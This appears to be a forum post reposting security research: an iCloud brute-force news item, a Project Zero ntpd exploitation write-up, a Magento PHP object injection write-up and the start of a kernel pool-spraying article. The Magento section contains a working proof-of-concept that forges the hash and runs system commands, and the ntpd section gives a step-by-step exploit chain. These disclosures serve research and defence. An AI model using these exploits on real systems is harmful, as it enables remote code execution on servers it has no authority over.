Nytro

Hacker Releases New Tool to Brute-Force Attack iCloud Passwords Posted on January 3, 2015 by Waqas Reports emerged of a new tool claiming the ability to successfully carry out password dictionary attacks on any iCloud account without being detected by Apple’s security. It seems that the vulnerability has just been patched and anyone trying to use this tool is being locked out of repeated password attempts. Earlier in September, Apple had reported that it had already patched up one hole that allowed brute-force attacks like these. The tool’s source code, released on GitHub, showed nothing extremely advanced. It just attempts every possible word out of its give 500 word list and tries it out for the password of any iCloud account email. The tool, judging from its source code, does not show that it will succeed at cracking passwords. Passwords that are not from the 500-word dictionary present in this tool are safe but it still posed a risk as many people do use simple dictionary words as their iCloud passwords. While this tool was crude and unsuccessful, more weathered hackers could develop it and use a much larger word list to use than this one. Apple appears to have resolved the hack now which simply relied on pretending to be an iPhone device. What is surprising is that fact that Apple allows indefinite requests without turning towards password locking after a certain number of requests for instance. At the same time this was happening, the Photos app for iCloud has been pulled and it is not yet clear if there is a connection between both stories. Sursa: http://hackread.com/brute-force-attack-icloud-passwords/

Finding and exploiting ntpd vulnerabilities Posted by Stephen Röttger, Time Lord [Foreword by Chris Evans: this post by Stephen represents the first Project Zero guest blog post. From time to time, we’ll be featuring guest blog posts for top-tier security research. In this instance, we’ve been impressed by the remotely exploitable nature of these vulnerabilities, as well as the clever chain of bugs and quirks that eventually leads to remote code execution. You’ve probably seen the recent ntpd vulnerability disclosures and this blog post tells the story from one of the researchers who discovered the issues. Over to Stephen…] A few months ago I decided to get started on fuzzing. I chose the reference implementation of the Network Time Protocol (NTP), ntpd, as my first target, since I have somebackground with NTP and the protocol seemed simple enough to be a good learning experience. Also, ntpd is available for many platforms and widely in use, including being part of the default OS X installation. While looking at the source to get a better understanding of the protocol I noticed that its processing is far more complex than I expected. Besides the time synchronization packets, ntpd supports symmetric and asymmetric (Autokey) authentication and so called private and control mode packets that let you query the daemon for stats or perform configuration changes (if I’m not mistaken, this is the protocol spoken by ntpdc and ntpq respectively). I quickly stumbled over a bug in the code processing Autokey protocol messages and decided to dig deeper and perform a manual code review of the other parts as well. This resulted in finding CVE-2014-9295 and writing my first ever OS X exploit for which I will present a write up today. tl;dr: a global buffer overflow can be triggered on common configurations by an attacker on the local network through an IPv6 packet with a spoofed ::1 source. If your ntpd is not patched yet, add nomodify or noquery to every restrict line in your config, even the ones for localhost. But enough of that, let's jump into the details. The Bug The most severe bug that turned out to be exploitable on OS X Mavericks is a buffer overflow in the code which handles control packets. Control mode responses are fragmented if they exceed the size of the buffer used to store them, as implemented in the following function: static void ctl_putdata( const char *dp, unsigned int dlen, int bin /* set to 1 when data is binary */ ) { //[...] /* * Save room for trailing junk */ if (dlen + overhead + datapt > dataend) { /* * Not enough room in this one, flush it out. */ ctl_flushpkt(CTL_MORE); } memmove((char *)datapt, dp, (unsigned)dlen); datapt += dlen; datalinelen += dlen; } As you can see, if the data to be written doesn't fit into the remaining buffer space <ctl_flushpkt> is called, which will send out the current packet and reset the datapt to point to the beginning of the buffer. However, memmove will be called in any case and if dlen is bigger than the total buffer size it will overflow the buffer. Note that the overflow happens in a global buffer and thus stack cookies won’t help in this case. So let's see if we can find a code path that will trigger this. In most invocations, the data to be written comes from a fixed size buffer that is smaller then the output buffer and thus won't overflow. The function <configure> which handles ntp.conf style remote configurations sent by a privileged client will send any error messages back to the client using <ctl_putdata>. By sending a configuration with enough errors, the error message string will exceed the buffer size. However, the fact that the written data is restricted to a fixed set of error messages makes exploitation difficult. A more powerful overwrite can be found in <read_variables>. The NTP daemon keeps a list of name=value variables that can be set through the configuration and read back with a control mode packet. If a variable bigger than the output buffer is read back, it will overflow and corrupt whatever is stored behind the buffer. Setting Variables So how can we set variables? As mentioned before, there is a control mode packet through which we can send configuration commands to ntpd and thereby set any variable we want. But this is obviously a privileged operation and protected by two mechanisms: Access to private and control mode queries can be restricted in ntp.conf based on the source IP. Default installations usually prohibit these queries for every source IP except for 127.0.0.1 and ::1. This is what e.g. Ubuntu, Debian and OS X do. The packet needs to be authenticated with a MAC for which the shared key has to be specified in ntp.conf, which again shouldn't be set on default installations. Bypassing the first one is actually not that hard if you’re on the same network. As we all know IP addresses can be spoofed. But can we spoof the address of localhost? It turns out OS X and the Linux Kernel behave similarly in this case. Any IP packet arriving on an external interface and with the source IP 127.0.0.1 will be dropped immediately. But if we use IPv6 instead we can actually spoof ::1 and send control mode packets to the daemon (some Linux distributions have firewall rules in place that protect against this, e.g. Red Hat). Thus, if we are on the same local network, we can send spoofed packets to the link-local address of the target and bypass the IP restrictions. But what about requirement number 2? This one sounds tough: how can you have a valid MAC if no key is specified? Quest for the Key Let’s back up and discuss a little bit of background first. Through ntp.conf you can specify multiple keys and assign key ids to them. These key ids can then be assigned to different roles, i.e., a requestkey can be used to authenticate private mode packets and a controlkey is used for control mode packets. We need a controlkey to send our configuration requests but a requestkey would actually suffice since a private mode packet exists that will set the controlkey id to a specified value. And that’s where another bug comes into play that was discovered by Neel Mehta. Let’s take a look what ntpd does if no requestkey was specified in the config: /* if doesn't exist, make up one at random */ if (authhavekey(req_keyid)) { //[...] } else { unsigned intrankey; rankey = ntp_random(); req_keytype = NID_md5; req_hashlen = 16; MD5auth_setkey(req_keyid, req_keytype, (u_char *)&rankey, sizeof(rankey)); authtrust(req_keyid, 1); } That’s right, if no key was specified, a random 31 bit key will be generated, which means we can brute force it by sending 2^31 packets to the vulnerable daemon with a 68 byte payload each. But wait, there’s more! The random key is created by a custom random number generator implementation that is seeded with a 32 bit value and we can get the output of this generator through standard time synchronization requests. Part of the receive timestamp that we get by querying the time from the daemon is a random value from this generator and each query allows us to recover around 12 bits of the output which we can use to brute force the seed offline. However, the feasibility of a naive brute force approach highly depends on the uptime of ntpd since the number of random values that have been created will increase the search space. To give an idea of the time complexity, my single core implementation takes a few hours on my laptop even if I limit the search space to the first 1024 random values, but you can throw more cores at the problem or precompute as much as possible and build a lookup table. At this point, we have an overflow in a global buffer that can be triggered remotely on standard configurations. Neat! The Overflow Now that we have the key, we can send configuration commands and write arbitrary variables. When reading them back from the daemon, you can optionally specify the variables that you’re interested in. ntpd will iterate through them, write them (separated by a comma) to the global buffer through the function <ctl_putdata> and finally flush them out with <ctl_flushpkt>. There are still some restrictions on this overflow that make exploitation notably harder. We can’t write 0x00, 0x22 (“) and 0xff. Some data will be appended after our overwrite. That is, “, “ between two variable writes and “\r\n” on the final flush. How to proceed from here depends on which OS/distribution/architecture you target since protection mechanisms and the memory layout of the global data structures will differ. A few examples: On x64, the inability to write null bytes prevents us from completely overwriting pointers since the most significant bytes are null bytes. This poses a problem since “\r\n” is appended to our data, which will limit the control over partial pointer overwrites. On x86 however, this shouldn’t be an issue. At least on Debian, some compile time protections are not enabled for ntpd. I.e. the executable is not position independent and the global offset table (GOT) is writable during runtime. On OS X Mavericks, the datapt variable which points to the current position in the buffer is located after the buffer itself while on Debian and Ubuntu the pointer is in front of the buffer and can’t be overwritten. I chose to try my luck on a 64 bit OS X Mavericks. Since I have no prior experience with OS X, please bear with me if I missed something obvious or use the wrong nomenclature . The environment looks like this: The binary, stack, heap and shared libraries are individually randomized with 16 bit entropy. The address of the shared libraries is randomized at boot time. On a crash, ntpd is restarted automatically with approximately 10 seconds delay. ntpd is compiled with stack cookies (which doesn’t matter in our case since we overflow a global buffer). The global offset table (GOT) is writable during runtime. For a reliable exploit we will have to bypass ASLR somehow, so let’s leak some pointers. This one is actually quite easy since the datapt variable, which as you might remember points to the current write location, is located after the buffer itself: We just have to overwrite the two least significant bytes of the datapt variable and as a consequence, ntpd will miscalculate the length and send you data after the buffer which leaks a pointer into the ntpd binary as well as a heap pointer. After that, the datapt variable is conveniently reset to point to the beginning of the buffer again. Note that usually “\r\n” would get appended to our data and corrupt the partial pointer overwrite. But since we overwrite the write pointer itself, the newline sequence will be written to the new destination instead. With the same trick, we can turn the bug into a slightly restricted write-what-where primitive: partially overwrite the datapt variable to point to where you want to write (minus a few bytes to make room for the separator) and then write arbitrary data with a second ntpd variable. Again, the fact that garbage is appended to our data is no issue for the first write since it will be written to the new location instead and won’t corrupt the pointer. Note that we can only write arbitrary data in front of the buffer since a higher address will trigger a flush and reset the datapt (after writing the separator, so this might still be used to corrupt a length field). Unfortunately, the appended bytes still pose a problem. If we try to do a partial pointer overwrite through this, the “\r\n” sequence will always corrupt the pointer before it is used. Well, almost always. The GOT, and this took me way too long to figure out, is actually writable and used twice before our overwrite gets corrupted by the addition of “\r\n”. Between writing a variable and flushing the packet, <strlen> and <free> are called. That means, if we partially overwrite the GOT entry of either of those functions, the pointer will be used before it gets corrupted and we control rip. Info leak, again Since we know the base address of the binary and can overwrite GOT entries we can just find a nice gadget in the binary and jump to it, right? Unfortunately, that doesn’t work. To see why, let’s take a look at a couple of example addresses from the binary and libsystem_c: 0x000000010641c000 /usr/sbin/ntpd 0x00007fff88791000 /usr/lib/system/libsystem_c.dylib The addresses of system libraries have two null bytes as their most significant bytes while the binary address starts with three null bytes. Thus if we overwrite the GOT entry of <strlen> with an address from the binary, there will still be 0x7f byte left from the library address (remember: we can’t write nul bytes). To obtain the address of a system library we could try to turn our overwrite into a better leak, e.g. by overwriting some length field. But there is a lazier approach due to a weakness of ASLR on OS X Mavericks. The most common libraries are loaded in the split library region (as “man vmmap” calls it) which is shared by all processes in the system. The load address of this region is randomized during boot. This means that the addresses stay the same if a program is restarted and that even libraries which are not used by the program are loaded in its address space and can be used for ROP gadgets. This and the fact that ntpd is restarted automatically when it crashes makes it possible to brute force the library addresses for <strlen> (libsystem_c) or <free> (libsystem_malloc) bytewise. If you reboot your system a few times, you can observe that the load address of the split library region is always of the form 0x00007fff8XXXX000, providing 16 bit of entropy or 17 bit in our case since the region can extend to 0x00007fff9XXXX000. Let’s use the libsystem_c address from the example before: 0x00007fff88791000. We know that <strlen> is located at offset 0x1720and thus 0x00007fff88792720is the address we’re trying to brute force. We start by brute forcing the upper 4 bits of the second least significant byte. We overwrite the GOT entry of <strlen> with 0x0720, resulting in the new entry 0x00007fff88790720. Since we didn’t hit the correct address ntpd will crash and won’t send us any replies anymore. In that case, we increment the address to 0x1720 and try it again. If ntpd does send us a reply, which will happen at 0x2720, we know that we found the correct byte and continue with the next one (0x012720). This way, we can recover the libsystem_c address in 304 tries (4 bit + 8 bit + 5 bit) in the worst case. OS X will restart ntpd approximately every 10 seconds but you will need to brute force the key anew for every try, so bring your supercomputer. Also, if you’re unlucky you will run into an endless loop and ntpd has to be killed manually. Arbitrary Code Execution If it wasn’t for the fact that ntpd runs in a sandbox we would be finished now. Just overwrite the GOT entry of <strlen> with the address of <system> and execute arbitrary commands since it will get called with a user controlled string. But all you get out of this is the following line in /var/log/system.log: sandboxd[405] ([41]): ntpd(41) deny process-exec /bin/sh Instead, we need to find a nice gadget to control the stack pointer and make it point to a ROP chain. The usual way to do this would be a stack pivot but the data we control on the stack is limited. On the stack, we control data in 3 locations which we can fill with arbitrary pointers, this time without any restrictions. Besides that, we completely control the contents of a global buffer at a known address in the binary and if we can get the stack pointer (rsp) to point to this buffer we can execute an arbitrary ROP chain. Since our exploit overwrites the GOT, we only control the instruction pointer once, i.e. we can’t chain multiple calls. Thus, our first gadget needs to increment the stack pointer by either 0x80, 0x90 or 0xb8 so that it will use one of our addresses on return and do something useful at the same time. Fortunately, I found the following gadget in libsystem_c.dylib: add rsp, 0x88 pop rbx pop r12 pop r13 pop r14 pop r15 pop rbp ret This gadget returns to our address at rsp+0xb8 and at the same time loads the value from rsp+0x90 into r12. Since we now control a register, we can chain gadgets that end in a call qword [reg+n] where reg points to the global buffer that we control. For example, the second gadget looks like this: mov rdi, r12 mov rsi, r14 mov rdx, r13 call qword [r12+0x10] With a few gadgets of this kind, we control rsi and can load it into rsp: push rsi pop rsp xor eax, eax pop rbp ret And with that, we’re done. This will crash on a ret instruction with rsp pointing to user-controlled and thus arbitrary code execution is straightforward. Since we control the stack, we can build a ROP chain that loads and executes shellcode and from there try to break outof the sandbox by attacking the kernel or IPC channels. But that is left as an exercise for the reader . Exploit Summary Send a bunch of regular time synchronization requests to leak random values. Brute force the seed and calculate the requestkey (which has the keyid 65535). Send a private mode packet signed with the requestkey and with a spoofed source IP of ::1 to the server to set the controlkey id to 65535. Send a configuration change to lift all restrictions for our IP address. Add our IP to get async notifications (we have to do this, since we overwrite a flag later that triggers if responses are sent directly or asynchronously). Trigger the overflow by setting a long variable and reading it back and leak the binary base address. Use the overflow again as a write-what-where primitive to brute force the address of <strlen> bytewise. Prepare the data on the stack and in the global buffer. Call the gadgets to control rsp and execute a ROP chain. Mitigation In case your ntpd is not patched yet, these bugs can be effectively protected against through changes in your ntp.conf. The vulnerable <ctl_putdata>function is used by the processing of control mode packets and this can be blocked completely by adding “noquery” to every restrict line in the configuration. As explained before, it is important to also add “noquery” to the restrict lines for localhost, since the IP based access restrictions can often be bypassed through spoofing. But note that this will prevent ntpq from working and you won’t be able to query for peer information and other stats anymore. For example, if your configurations includes multiple “restrict” lines: restrict default kod nomodify notrap nopeer noquery restrict -6 default kod nomodify notrap nopeer noquery restrict 127.0.0.1 restrict -6 ::1 make sure that “noquery” is included in all of those: restrict default kod nomodify notrap nopeer noquery restrict -6 default kod nomodify notrap nopeer noquery restrict 127.0.0.1 noquery restrict -6 ::1 noquery Posted by Chris Evans at 4:28 AM Sursa: Project Zero: Finding and exploiting ntpd vulnerabilities

Magento 1.9.0.1 PHP Object Injection Recently, I found a PHP Object Injection (POI) vulnerability in the administrator interface of Magento 1.9.0.1. Magento is an e-commerce software written in PHP that was acquired by Ebay Inc. A bug bounty program is run that attracts with a 10,000$ bounty for remote code execution bugs. A POI vulnerability can lead to such a remote code execution, depending on the gadget chains the attacker is able to trigger. Sadly I stopped investigating the POI vulnerability and resumed 1 week later – a fatal error. When I continued investigating exploitable gadget chains, Magento pushed an update in the meantime that patches several security issues. The POI is not mentioned anywhere, but it is fixed by replacing the affected unserialize() call with json_decode(). So no bug bounty, but the exploitation is still worth a look at because it includes a hash verification bypass and a cool gadget that allowed full code coverage in gadget chaining. In the end, an attacker can execute arbitrary code on the targeted server. However, administrator privileges are required. 1. PHP Object Injection In Magento 1.9.0.1, the method tunnelAction() of the administrator’s DashboardController is affected by a POI vulnerability. It deserializes user data supplied in the ga parameter. [TABLE] [TR] [TD=class: gutter]86 87 88 89 90 91 92 93 94[/TD] [TD=class: code]// app/code/core/Mage/Adminhtml/controllers/DashboardController.php public function tunnelAction() { $gaData = $this->getRequest()->getParam('ga'); $gaHash = $this->getRequest()->getParam('h'); if ($gaData && $gaHash) { $newHash = Mage::helper('adminhtml/dashboard_data')->getChartDataHash($gaData); if ($newHash == $gaHash) { if ($params = unserialize(base64_decode(urldecode($gaData)))) { [/TD] [/TR] [/TABLE] A closer look reveals, however, that the base64 encoded, serialized data is protected with a hash from manipulation. The hash of the gaData is generated with the method getChartDataHash() and is then compared to the hash supplied in the h parameter. Only if both hashes match, the data is deserialized. Lets get some sample data. The tunnelAction() is triggered, when the dashboard graph is loaded. [TABLE] [TR] [TD=class: gutter]61 62[/TD] [TD=class: code]// app/design/adminhtml/default/default/template/dashboard/graph.phtml <img src="<?php echo $this->getChartUrl(false) ?> [/TD] [/TR] [/TABLE] Here, the method getChartUrl() serializes graph parameters and creates the gaHash of the base64 encoded gaData. [TABLE] [TR] [TD=class: gutter]446 447 448 449 450 451 452 453[/TD] [TD=class: code]// app/code/core/Mage/Adminhtml/Block/Dashboard/Graph.php function getChartUrl() { ... $gaData = urlencode(base64_encode(serialize($params))); $gaHash = Mage::helper('adminhtml/dashboard_data')->getChartDataHash($gaData); $params = array('ga' => $gaData, 'h' => $gaHash); return $this->getUrl('*/*/tunnel', array('_query' => $params)); }[/TD] [/TR] [/TABLE] The following request is generated and can be intercepted: [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]/index.php/admin/dashboard/tunnel/key/803e506c399449c72975fc1fcc2c0435/ ?ga=eyJjaHQiOiJsYyIsImNoZiI6ImJnLHMsZjRmNGY0fGMsbGcsOTAsZmZmZmZmLDAuMSxlZGVkZWQsMCIsImNobSI6IkIsZjRkNGIyLDAsMCwwIiwiY2hjbyI6ImRiNDgxNCIsImNoZCI6ImU6IiwiY2h4dCI6IngseSIsImNoeGwiOiIwOnx8fDk6MDAgdm9ybS58fHwxMjowMCBuYWNobS58fHwzOjAwIG5hY2htLnx8fDY6MDAgbmFjaG0ufHx8OTowMCBuYWNobS58fHwxMjowMCB2b3JtLnx8fDM6MDAgdm9ybS58fHw2OjAwIHZvcm0ufDE6fDB8MSIsImNocyI6IjU4N3gzMDAiLCJjaGciOiI0LjM0NzgyNjA4Njk1NjUsMTAwLDEsMCJ9 &h=61f3757d04b665baac6f8176a2012337[/TD] [/TR] [/TABLE] We can base64 decode the data in the ga parameter (line 2) and modify the serialized parameters in order to exploit the PHP Object Injection vulnerability. However, we then have to generate a valid hash for our malformed data and replace it with the hash in the h parameter (line 3). Otherwise, our manipulated data is not deserialized. 2. Hash Verification Lets have a look at how the hash is generated and if we can forge it for manipulated data. The hash is created in the getChartDataHash() method by calculating the MD5 hash of the base64 encoded data concatenated with a secret. If we know this secret, we can generate our own hash for our modified gaData. [TABLE] [TR] [TD=class: gutter]86 87 88 89 90 91[/TD] [TD=class: code]// app/code/core/Mage/Adminhtml/Helper/Dashboard/Data.php public function getChartDataHash($data) { $secret = (string)Mage::getConfig()->getNode(Mage_Core_Model_App::XML_PATH_INSTALL_DATE); return md5($data . $secret); } [/TD] [/TR] [/TABLE] Luckily, the secret is cryptographically very weak. As the constant’s name suggests, the config value XML_PATH_INSTALL_DATE refers to the date of the Magento installation in RFC 2822 format. For example, the secret date could look like the following: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]Sat, 1 Nov 2014 21:08:46 +0000[/TD] [/TR] [/TABLE] Assuming that the installation was performed maximum 1 year ago, there are less than 31 * 12 * 24*60*60 = 32 Mio possibilities. We can take the intercepted sample data to bruteforce the secret date locally. Furthermore, we can narrow down the possible date window by observing the HTTP response header of the targeted web server. For example, the HTTP response for a request of the favicon file tells us its last modification date: [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]Request: GET /favicon.ico HTTP/1.0[/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]Response If-Modified-Since: Wed, 05 Nov 2014 09:06:45 GMT [/TD] [/TR] [/TABLE] This should equal to the exact date when the installation files were copied to the server. We can then assume, that the installation was performed at least within the same month when this file was extracted. Also, it tells us the timezone (here GMT) used by the server. This leaves us only with 30 * 24*60*60 = 2.6 Mio possibilities which can be bruteforced within a few seconds. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15[/TD] [TD=class: code]$gaData = 'eyJjaHQiOiJsYyIsImNoZiI6ImJnLHMsZjRmNGY0fGMsbGcsOTAsZmZmZmZmLDAuMSxlZGVkZWQsMCIsImNobSI6IkIsZjRkNGIyLDAsMCwwIiwiY2hjbyI6ImRiNDgxNCIsImNoZCI6ImU6IiwiY2h4dCI6IngseSIsImNoeGwiOiIwOnx8fDk6MDAgdm9ybS58fHwxMjowMCBuYWNobS58fHwzOjAwIG5hY2htLnx8fDY6MDAgbmFjaG0ufHx8OTowMCBuYWNobS58fHwxMjowMCB2b3JtLnx8fDM6MDAgdm9ybS58fHw2OjAwIHZvcm0ufDE6fDB8MSIsImNocyI6IjU4N3gzMDAiLCJjaGciOiI0LjM0NzgyNjA4Njk1NjUsMTAwLDEsMCJ9'; $hash = '61f3757d04b665baac6f8176a2012337'; date_default_timezone_set('GMT'); // Wed, 05 Nov 2014 09:06:45 GMT $timestamp = mktime(9, 6, 45, 11, 5, 2014); $today = time(); for($i=0;$i<2592000 && $timestamp<$today; $i++) { $secret = date(DATE_RFC2822, $timestamp++); if(md5($gaData . $secret) === $hash) { echo $secret; break; } }[/TD] [/TR] [/TABLE] Once we obtained the secret, we can alter the serialized data and create a valid hash for it, so our data is deserialized by the server. That means we can inject arbitrary objects into the application and trigger gadget chains by invoking the object’s magic methods (for more details please refer to our paper). 3. Gadget Chain Magento’s code base is huge and many interesting initial gadgets (magic methods) can be found that trigger further gadgets (methods). For example, the usual File Deletion and File Permission Modification calls can be triggered in order to delete files. This is partly interesting in Magento, because the deletion of the /app/.htaccess file allows to access the /app/etc/local.xml file which contains the crypto key. However, since we own already administrative privileges, we are interested in more severe vulnerabilities. It turns out, that the included (and autoloaded) Varien library provides all gadgets we need to execute arbitrary code on the server. The deprecated class Varien_File_Uploader_Image provides a destructor as our initial gadget that allows us to jump to arbitrary clean() methods. [TABLE] [TR] [TD=class: gutter]356 357 358 359 360[/TD] [TD=class: code]// lib/Varien/File/Uploader/Image.php:357 function __destruct() { $this->uploader->Clean(); }[/TD] [/TR] [/TABLE] This way, we can jump to the clean() method of the class Varien_Cache_Backend_Database. It fetches a database adapter from the property _adapter and executes a TRUNCATE TABLE query with its query() method. The table name can be controlled by the attacker by setting the property _options[‘data_table’]. [TABLE] [TR] [TD=class: gutter]249 250 251 252 253 254 255 256 257 258 259 260 261[/TD] [TD=class: code]// lib/Varien/Cache/Backend/Database.php public function clean($mode = Zend_Cache::CLEANING_MODE_ALL, $tags = array()) { $adapter = $this->_adapter; switch($mode) { case Zend_Cache::CLEANING_MODE_ALL: if ($this->_options['store_data']) { $result = $adapter->query('TRUNCATE TABLE '.$this->_options['data_table']); } ... } }[/TD] [/TR] [/TABLE] If we provide the Varien_Db_Adapter_Pdo_Mysql as database adapter, its query() method passes along the query to the very interesting method _prepareQuery(), before the query is executed. [TABLE] [TR] [TD=class: gutter]421 422 423 424 425 426 427 428 429 430 431 432[/TD] [TD=class: code]// lib/Varien/Db/Adapter/Pdo/Mysql.php public function query($sql, $bind = array()) { try { $this->_checkDdlTransaction($sql); $this->_prepareQuery($sql, $bind); $result = parent::query($sql, $bind); } catch (Exception $e) { ... } } [/TD] [/TR] [/TABLE] The _prepareQuery() method uses the _queryHook property for reflection. Not only the method name is reflected, but also the receiving object. This allows us to call any method of any class in the Magento code base with control of the first argument – a really cool gadget found by the new RIPS prototype. [TABLE] [TR] [TD=class: gutter]463 464 465 466 467 468 469 470 471 472 473 474[/TD] [TD=class: code]// lib/Varien/Db/Adapter/Pdo/Mysql.php protected function _prepareQuery(&$sql, &$bind = array()) { ... // Special query hook if ($this->_queryHook) { $object = $this->_queryHook['object']; $method = $this->_queryHook['method']; $object->$method($sql, $bind); } } [/TD] [/TR] [/TABLE] From here it wasn’t hard to find a critical method that operates on its properties or its first parameter. For example, we can jump to the filter() method of the Varien_Filter_Template_Simple class. Here, the regular expression of a preg_replace() call is built dynamically with the properties _startTag and _endTag that we control. More importantly, the dangerous eval modifier is already appended to the regular expression, which leads to the execution of the second preg_replace() argument as PHP code. [TABLE] [TR] [TD=class: gutter]39 40 41 42 43 44 45[/TD] [TD=class: code]// lib/Varien/Filter/Template/Simple.php public function filter($value) { return preg_replace('#'.$this->_startTag.'(.*?)'.$this->_endTag.'#e', '$this->getData("$1")', $value); } [/TD] [/TR] [/TABLE] In the executed PHP code of the second preg_replace() argument, the match of the first group is used ($1). Important to note are the double quotes that allow us to execute arbitrary PHP code by using curly brace syntax. 4. Exploit Now we can put everything together. We inject a Varien_File_Uploader_Image object that will invoke the class’ destructor. In the uploader property we create a Varien_Cache_Backend_Database object, in order to invoke its clean() method. We point the object’s _adapter property to a Varien_Db_Adapter_Pdo_Mysql object, so that its query() method also triggers the valuable _prepareQuery() method. In the _options[‘data_table’] property, we can specify our PHP code payload, for example: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]{${system(id)}}RIPS[/TD] [/TR] [/TABLE] We also append the string RIPS as delimiter. Then we point the _queryHook property of the Varien_Db_Adapter_Pdo_Mysql object to a Varien_Filter_Template_Simple object and its filter method. This method will be called via reflection and receives the following argument: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]TRUNCATE TABLE {${system(id)}}RIPS[/TD] [/TR] [/TABLE] When we not set the Varien_Filter_Template_Simple object’s property _startTag to TRUNCATE TABLE and the property _endTag to RIPS the first match group of the regular expression in the preg_replace() call will be our PHP code. Thus, the following PHP code will be executed: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]$this->getData("{${system(id)}}")[/TD] [/TR] [/TABLE] In order to determine the variables name, the system() call will be evaluated within the curly syntax. This leads us to execution of arbitrary PHP code or system commands. PoC: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43[/TD] [TD=class: code]class Zend_Db_Profiler { protected $_enabled = false; } class Varien_Filter_Template_Simple { protected $_startTag; protected $_endTag; public function __construct() { $this->_startTag = 'TRUNCATE TABLE '; $this->_endTag = 'RIPS'; } } class Varien_Db_Adapter_Pdo_Mysql { protected $_transactionLevel = 0; protected $_queryHook; protected $_profiler; public function __construct() { $this->_queryHook = array(); $this->_queryHook['object'] = new Varien_Filter_Template_Simple; $this->_queryHook['method'] = 'filter'; $this->_profiler = new Zend_Db_Profiler; } } class Varien_Cache_Backend_Database { protected $_options; protected $_adapter; public function __construct() { $this->_adapter = new Varien_Db_Adapter_Pdo_Mysql; $this->_options['data_table'] = '{${system(id)}}RIPS'; $this->_options['store_data'] = true; } } class Varien_File_Uploader_Image { public $uploader; public function __construct() { $this->uploader = new Varien_Cache_Backend_Database; } } $obj = new Varien_File_Uploader_Image; $b64 = base64_encode(serialize($obj)); $secret = 'Sat, 1 Nov 2014 21:08:46 +0000'; $hash = md5($b64 . $secret); echo '?ga='.$b64.'&h='.$hash;[/TD] [/TR] [/TABLE] The POI was straight-forward but we had to circumvent a hash verification first and find nice gadgets. A reflection injection allowed us to trigger almost arbitrary gadget chains through the entire code base that in the end allowed remote code execution. In the next post we have a look at another POI I played with lately, but triggering the POI itself will be more tricky. Sursa: https://websec.wordpress.com/2014/12/08/magento-1-9-0-1-poi/

[h=2]Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool[/h] [h=2]The State of Kernel Exploitation[/h] The typical write-what-where kernel-mode exploit technique usually relies on either modifying some key kernel-mode data structure, which is easy to do locally on Windows thanks to poor Kernel Address Space Layout Randomization (KASLR), or on redirecting execution to a controlled user-mode address, which will now run with Ring 0 rights. Relying on a user-mode address is an easy way not to worry about the kernel address space, and to have full control of the code within a process. Editing the tagWND structure or the HAL Dispatch Table are two very common vectors, as are many others. However, with Supervisor Mode Execution Prevention (SMEP), also called Intel OS Guard, this technique is no longer reliable — a direct user-mode address cannot be used, and other techniques must be employed instead. One possibility is to disable SMEP Enforcement in the CR4 register through Return-Oriented Programming, or ROP, if stack control is possible. This has been covered in a few papers and presentations. Another related possibility is to disable SMEP Enforcement on a per-page basis — taking a user-mode page and marking it as a kernel page by making the required changes in the page level translation mapping entries. This has also been talked in at least one presentation, and, if accepted, a future SyScan 2015 talk from a friend of mine will also cover this technique. Additionally, if accepted, an alternate version of the technique will be presented at INFILTRATE 2015, by yours truly. Finally, a theoretical possibility is being able to transfer execution (through a pointer, callback table, etc) to an existing function that disables SMEP (and thus bypassing KASLR), but then somehow continues to give the attacker control without ROP — nobody has yet found such a function. This would be a type of Jump-Oriented Programming (JOP) attack. Nonetheless, all of these techniques continue to leverage a user-mode address as the main payload (nothing wrong with that). However, one must also consider the possibility to use a kernel-mode address for the attack, which means that no ROP and/or PTE hacking is needed to disable SMEP in the first place. Obviously, this means that the function to perform the malicious payload’s work already exists in the kernel, or we have a way of bringing it into the kernel. In the case of a stack/pool overflow, this payload probably already comes with the attack, and the usual tricks have been employed there in order to get code execution. Such attacks are particularly common in true ‘remote-remote’ attacks. But what of write-what-where bugs, usually the domain of the local (or remote-local) attacker? If we have user-mode code execution available to us, to execute the write-what-where, we can obviously continue using the write-what-where exploit to repeatedly fill an address of our choice with the payload data. This presents a few problems however: The write-what-where may be unreliable, or corrupt adjacent data. This makes it hard to use it to ‘fill’ memory with code. It may not be obvious where to write the code — having to deal with KASLR as well as Kernel NX. On Windows, this is not terribly hard, but it should be recognized as a barrier nonetheless. This blog post introduces what I believe to be two new techniques, namely a generic kernel-mode heap spraying technique which results in executable memory, followed by a generic kernel-mode heap address discovery technique, bypassing KASLR. [h=2]Big Pool[/h] Experts of the Windows heap manager (called the pool) know that there are two different allocators (three, if you’re being pedantic): the regular pool allocator (which can use lookaside lists that work slightly differently than regular pool allocations), and the big/large page pool allocator. The regular pool is used for any allocations that fit within a page, so either 4080 bytes on x86 (8 bytes for the pool header, and 8 bytes used for the initial free block), or 4064 bytes on x64 (16 bytes for the pool header, 16 bytes used for the initial free block). The tracking, mapping, and accounting of such allocations is handled as part of the regular slush of kernel-mode memory that the pool manager owns, and the pool headers link everything together. Big pool allocations, on the other hand, take up one or more pages. They’re used for anything over the sizes above, as well as when the CacheAligned type of pool memory is used, regardless of the requested allocation size — there’s no way to easily guarantee cache alignment without dedicating a whole page to an allocation. Because there’s no room for a header, these pages are tracked in a separate “Big Pool Tracking Table” (nt!PoolBigPageTable), and the pool tags, which are used to identify the owner of an allocation, are also not present in the header (since there isn’t one!), but rather in the table as well. Each entry in this table is represented by a POOL_TRACKER_BIG_PAGES structure, documented in the public symbols: [TABLE] [TR] [TD=class: line_numbers]1 2 3 4 5 [/TD] [TD=class: code]lkd> dt nt!_POOL_TRACKER_BIG_PAGES +0x000 Va : Ptr32 Void +0x004 Key : Uint4B +0x008 PoolType : Uint4B +0x00c NumberOfBytes : Uint4B[/TD] [/TR] [/TABLE] One thing to be aware of is that the Virtual Address (Va) is OR’ed with a bit to indicate if the allocation is freed or allocated — in other words, you may have duplicate Va’s, some freed, and at most one allocated. The following simple WinDBG script will 